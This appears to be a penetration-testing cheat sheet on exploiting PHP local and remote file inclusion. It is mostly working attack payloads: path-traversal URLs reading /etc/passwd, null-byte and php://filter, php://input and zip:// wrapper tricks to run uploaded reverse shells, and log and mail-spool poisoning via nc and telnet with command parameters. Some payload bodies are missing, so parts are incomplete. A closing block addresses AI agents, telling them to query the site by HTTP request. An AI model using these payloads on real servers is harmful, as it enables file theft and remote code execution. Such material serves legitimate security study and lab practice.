# PHP - LFI and RFI
**How to Exploit PHP LFI/RFI and Methods:**
**1) Basic Local File Inclusion and Remote File Inclusion**\
**2) Null Byte**\
**3) Base64 Encoded**\
**4) PHP Input Wrapper**\
**5) PHP Zip Wrapper**\
**6) proc/self/environ**\
**7) Log File Contamination**\
**8) Email Revese Shell**\
**9) phpinfo LFI**
## **Basic Local File Inclusion and Remote File Inclusion**
```
http://example.com/script.php?page=../../../../../../../../etc/passwd
http://example.com/script.php?language=/etc/passwd
```
## **Null Byte**
```bash
# On PHP 5.3 and below, you can use Null Byte %00 to bypass php from appending .php extensions
http://example.com/script.php?language=/etc/passwd%00
# Another way to deal with this is to use the ? (question mark) in order to make the rest of the strings to be interpreted as a parameter.
# Also try %2500
http://example.com/script.php?language=/etc/passwd?
```
## **Base64 Encoded**
```bash
index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
index.php?page=php://filter/convert.base64-encode/resource=index.php
```
**PHP Input Wrapper - POST**\
Example 1:
----------------
```bash
http://192.168.183.128/fileincl/example1.php?page=php://input
# POST Data would be something like this:
# After uploading execute the reverse shell at:
http://192.168.183.129/shell.php
```
Example 2:
## **PHP Zip Wrapper**
The zip wrapper processes uploaded .zip files server side allowing a penetration tester to upload a zip file using a vulnerable file upload function and leverage he zip filter via an LFI to execute. A typical attack example would look like:
1\. Create a PHP reverse shell\
2\. Compress to a .zip file\
3\. Upload the compressed shell payload to the server\
4\. Use the zip wrapper to extract the payload using:
```bash
php?page=zip://path/to/file.zip%23shell
```
5\. The above will extract the zip file to shell, if the server does not append .php rename it to shell.php instead
## **proc/self/environ**
```bash
/proc/self/environ
# If the above works and we have access to the file... then you can do this via the User Agent:
User Agent:
```
## **Log File Contamination**
```bash
nc -nv 10.10.10.35 80
# To execute it:
http://10.10.10.7/vuln.php?page=../../../../../../../../../var/log/apache2/access.log%00&cmd=ipconfig
```
## **Email Revese Shell**
```bash
telnet 10.10.10.7 25
EHLO ippsec.beep.htb
VRFY asterisk@localhost
### if successful, then:
mail from:pwned@haha.io
rcpt to: asterisk@localhost
data
Subject: You have been pwned
.
# Don't forget the . (dot) above
# Then:
http://10.10.10.7/vuln.php?page=../../../../../../../../../var/mail/asterisk%00&ipp=whoami
```
## **phpinfo() LFI**
{% embed url="" %}
1 - Check if upload is enabled
```bash
GET /phpinfo.php HTTP/1.1
```
2 - Execute the POST with **Content Type** and check for PHP variables. Below are two examples.
Example 1 from the documentation:
Example 2 from IPPSEC - POISON
2 - The script is located at PayLoadAllTheThings - PHP LFI Path.
```bash
# Must change:
- PAYLOAD
- URI
- [tmp_name] => TO [tmp_name] =>
```
3 - Start the listener and get it done
**References**:\
\
\
\
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://squid22.gitbook.io/notes/php/php-lfi-rfi-linux.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.